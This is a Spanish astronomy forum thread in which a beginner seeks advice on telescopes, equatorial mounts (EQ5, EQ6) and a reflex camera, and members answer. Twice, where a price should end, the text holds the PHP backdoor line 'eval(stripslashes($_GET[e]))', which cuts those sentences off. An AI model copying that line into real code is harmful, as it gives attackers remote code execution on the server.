Ayuda elección telescopio

Consultas generales
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Ayuda elección telescopio

Mensaje por m3ntol »

Carlos,
si quieres comprar un equipo de astrofoto que sea, más o menos, definitivo prepara unos 10.000
phpbb:eval(stripslashes($_GET[e]));
carlos
Mensajes: 96
Registrado: Mar Sep 01, 2009 8:45 pm

Ayuda elección telescopio

Mensaje por carlos »

Si la verdad es que llevas toda la razón, mejor ir poco a poco jejeje.

A ver, te comento un poco mi equipo:
- Refractor SkyLux 70/700 (lidlscopio :D :D ) con su montura ecuatorial correspondiente (sin motorizar)

-Oculares que traía el telescopio de 4, 12 y 20 mm

- Webcam Phillips SPC840NC/16 con sensor CCD

Como podeis deducir el equipo es un poco corto, de ahí mi intención de mejorarlo (en especial el telescopio y la montura) y comprarme algunos oculares y barlow. Esto es lo que más necesitaba, pero mi padre quiere comprar una reflex y he visto mi oportunidad, decantándome más por la canon 400d por eso de que es más moderna y corrige la "marca". Asímismo me gustaría decir que me atraen más los telescopios reflectores (por la observaciñon del espacio profundo), pero el problema es que los dobson no valen para astrofotografía y los que son muy grandes necesitan monturas muy caras (como la EQ6).

EDIT: También me gusta bastante la observación con mis propios ojos (de hecho es lo que más me gusta), por lo que me gustaria un equilibrio entre astrofotografia y obsevarción.
theheavy
Mensajes: 871
Registrado: Mié Sep 02, 2009 7:59 pm

Ayuda elección telescopio

Mensaje por theheavy »

Yo te aconsejo lo mismo de siempre, vente a la proxima y ves con tus propios ojos la candidad de cables, trastos y... ( RUUUUM, RUUUUM ) que llevan los de las fotitos...
Y tomatelo con calma.
Mas vale estar callado y parecer tonto,
que abrir la boca y demostrarlo.
carlos
Mensajes: 96
Registrado: Mar Sep 01, 2009 8:45 pm

Ayuda elección telescopio

Mensaje por carlos »

Estaré atento a vuestra próxima salida, aunque ir a Brihuega me es imposible :( .
Por cierto, ai un telescopio que me ha llamado mucho la antencion que es un Orion dobson motorizado de 305/1500. MAL1 me dijo que esta bien para astrofotografía planetaria pero de espacio profundo no ya que requiere mucha exposicion. ¿Esto se podia remediarse o directamente no vale?. Pero para observacion "a ojo" esta bien ¿no?.
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Ayuda elección telescopio

Mensaje por Manuelariza »

Un ejemplo del equipo que tengo yo.

Montura EQ6 1150
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Ayuda elección telescopio

Mensaje por m3ntol »

Carlos,
si te gusta la observación visual y no quieres gastar una barbaridad, cómprate un reflector sobre montura motorizada. Un equipo que a mi siempre me ha gustado es un 8` ` sobre EQ5. En visual vas a poder acceder a todos los objetos y la montura se va a portar bien.

Si quieres usarla para fotografía puedes empezar por hacer planetaria con webcam y fotos de la luna con la reflex. Te aseguro que vas a aprender muchas cosas y el equipo vas a usarlo a menudo.

Estamos hablando de un telescopio completo que sale por unos 700
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Ayuda elección telescopio

Mensaje por Manuelariza »

El equipo que compraria para visual y en el futuro para astrofotos,es el que tengo.

Montura EQ6,mas cara que la EQ5 pero lo vas a agradecer,tubo un Newton GSO de 8" f/4 o un Orion tambien de 8"f/4,es el mismo tubo pero con diferente marca.Con el tiempo te vas comprando el resto de trastos que necesitas para astrofotos.

Es un equipo que sale bien de precio y de calidad muy aceptable.
Te recomiendo la EQ6 por que si en el futuro te metes en la astrofotografia,entre el tubo y demas trastos te encuentras con unos 10 o 11kg de carga y la EQ5 ya estara en el limite,a no ser que consideres la opcion que te recomienda M3ntol del ED de 80mm,entoces la EQ5 si te ira bien.
El conjuto de EQ6 y newton de 8" te saldra por unos 1650
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
carlos
Mensajes: 96
Registrado: Mar Sep 01, 2009 8:45 pm

Ayuda elección telescopio

Mensaje por carlos »

Entonces mejor comprarme una EQ5 con uno de 8" que el dobson de 12" con montura motorizada?? El dobson tiene más apertura y con la montura cuesta menos, ¿qué es lo que hace que sea una elección peor que el 8" con eq5?

También me gustaría que me explicárais que diferencias hay entre las diferentes EQ` s, ya que en varias páginas he visto tubos de 10" en EQ5, de 8" en EQ3 (monturas menores a las que recomendais vosotros, es por el seguimiento)

Por cierto, he estado mirando la canon EOS 400d y no encuentro cámaras nuevas, creo que están descatalogadas, ¿cuál es la nueva versión? ¿esa versión es igual de recomendable que la 400 o es mejor comprarla seminueva?

Un saludo y gracias por vuestras respuestas

P.D: viendo las fotos de alfalben y su equipo, creo que primero me dedicaré a la observación y a la fotografía básica, cuando sepa más me dedicaré más en serio a las fotos :D :D
Avatar de Usuario
Arbacia
Mensajes: 1185
Registrado: Vie Ago 31, 2007 2:50 pm

Ayuda elección telescopio

Mensaje por Arbacia »

[quote="carlos"]...//... ya que en varias páginas he visto tubos de 10" en EQ5, de 8" en EQ3 (monturas menores a las que recomendais vosotros, es por el seguimiento)[/quote]

Tácticas comerciales para incautos noveles.
El no iniciado piensa en tubo gordo, y piensa en aumentos, muchos aumentos, cuanto más mejor, Cuando ya llevas un tiempo te das cuenta que lo bonito suele estar a bajos aumentos y que la montura es una parte extremadamente importante del sistema. De hecho quien ha de estar sobredimensionada es la montura, nunca el tubo.

Un tubo demasiado grande o pesado para la montura significa que cualqueir brisa, roce o toque de enfocador, hace que esta vibre. Es normal que una montura adecuada vibre de uno a tres segundos tras , por ejemplo, tocar el enfocador, peo cuando tarda más de 7 segundos en amortiguarse hace tediosa la observación y comienzas a aborrecer la observación.

¿cuanto quieres gastarte en total?
carlos
Mensajes: 96
Registrado: Mar Sep 01, 2009 8:45 pm

Ayuda elección telescopio

Mensaje por carlos »

Si, la verdad es que me suponía que era eso jajaja, para vender más. Mi mayor duda en cuanto las monturas es saber si la diferencia entre las diferentes EQ` s es sólo en tamaño o también hay alguna diferencia más.
Responder